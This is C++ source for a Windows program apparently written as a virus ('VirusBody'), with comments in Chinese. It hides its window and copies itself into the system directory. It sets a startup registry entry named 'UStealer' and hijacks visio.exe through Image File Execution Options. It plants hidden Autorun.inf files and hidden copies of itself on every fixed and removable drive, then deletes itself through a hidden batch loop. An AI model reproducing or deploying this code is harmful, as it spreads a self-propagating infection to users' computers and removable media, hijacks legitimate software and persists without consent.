void CHXVirusBody01Dlg::OnBnClickedOk()
{
// 拷贝到系统目录
CopySelf();
// 修改注册表
RegChange();
// 生成autorun.inf文件
Autorun();
// 自删除
DeleteSelf();
}
void CHXVirusBody01Dlg::CopySelf()
{
// 隐藏窗体
this->ShowWindow(SW_HIDE);
TCHAR szSysPath[MAX_PATH] = { 0 };
GetSystemDirectory(szSysPath, sizeof(szSysPath));
CString strFileName = szSysPath;
strFileName += _T("\\test.exe");
CopyFile(AfxGetApp()->m_pszAppName, strFileName.GetBuffer(), TRUE);
}
void CHXVirusBody01Dlg::DeleteSelf()
{
//获取自己的完整路径
char buf[MAX_PATH] = { 0 };
HMODULE hModel = NULL;
hModel = GetModuleHandle(0);
GetModuleFileNameA(hModel, buf, MAX_PATH);
CloseHandle((HANDLE)4);
//生成批处理文件
std::fstream fFile;
fFile.open(("1.bat"), std::ios::in | std::ios::out | std::ios::app);
if (!fFile.is_open())
{
return ;
}
fFile.seekg(std::ios::beg);
std::string str;
str = ("@echo off\r\n");
str += (":start\r\n\tif not exist ");
str += buf;
str += (" goto done\r\n");
str += ("\tdel /f /q ");
str += buf;
str += ("\r\n");
str += ("goto start\r\n");
str += (":done\r\n");
str += ("\tdel /f /q %0\r\n");
fFile << str << std::endl;
fFile.close();
//隐藏运行批处理文件
ShellExecute(NULL, _T("open"), _T("1.bat"), NULL, NULL, SW_HIDE);
exit(0);
}
void CHXVirusBody01Dlg::RegChange()
{
// 添加开机启动
HKEY hKey = NULL;
DWORD rc;
char buffer[MAX_PATH] = { 0 };
rc = ::RegOpenKeyEx(HKEY_LOCAL_MACHINE,
_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
0,
KEY_ALL_ACCESS,
&hKey);
if (ERROR_SUCCESS == rc)
{
auto hx = AfxGetApp();
::RegSetValueEx(hKey, _T("UStealer"), 0, REG_SZ, (BYTE*)AfxGetApp()->m_pszAppName, lstrlen(AfxGetApp()->m_pszAppName));
RegCloseKey(hKey);
}
// 添加映像劫持列表
DWORD dwDisposition = REG_CREATED_NEW_KEY;
if ((::RegCreateKeyEx(HKEY_LOCAL_MACHINE,
_T("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\visio.exe"),
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
NULL,
&hKey,
&dwDisposition)) == ERROR_SUCCESS)
{
CString str = AfxGetApp()->m_pszExeName;
::RegSetValueEx(hKey, _T("Debugger"), 0, REG_SZ, (BYTE*)str.GetBuffer(), str.GetLength());
::RegCloseKey(hKey);
}
}
void CHXVirusBody01Dlg::Autorun()
{
char Disk = NULL;
UINT Type = 0;
FILE * fp;
char strFileName[MAX_PATH] = { 0 };
char szDriveName[4] = { 0 };
wsprintfA(szDriveName, ("C\\0"));
// 遍历所有可能存在的分区
for (szDriveName[0] = 'C'; szDriveName[0] < 'Z'; ++szDriveName[0])
{
// 得到该分区的类型
Type = GetDriveTypeA(szDriveName);
if ((Type == DRIVE_REMOVABLE) || (Type == DRIVE_FIXED))
{
// 该盘是固定分区或者移动设备,感染
Disk = szDriveName[0];
sprintf_s(strFileName, ("%c:\\Autorun.inf"), Disk);
// 创建Autorun.inf文件并写入内容
fp = fopen(strFileName, ("w+"));
fprintf_s(fp, ("[AutoRun]\n"));
fprintf_s(fp, ("OPEN=test.exe\n"));
fprintf_s(fp, ("SHELLEXECUTE=test.exe\n"));
fprintf_s(fp, ("shell\\Auto\\command=test.exe\n"));
fprintf_s(fp, ("shell=Auto"));
fclose(fp);
// 将文件属性设置为隐藏
SetFileAttributesA(strFileName, FILE_ATTRIBUTE_HIDDEN);
// 拷贝入这些分区的根目录中
sprintf_s(strFileName, ("%c:\\test.exe"), Disk);
CopyFile(AfxGetApp()->m_pszExeName, strFileName, TRUE);
// 将文件属性设置为隐藏
SetFileAttributesA(strFileName, FILE_ATTRIBUTE_HIDDEN);
}
}
}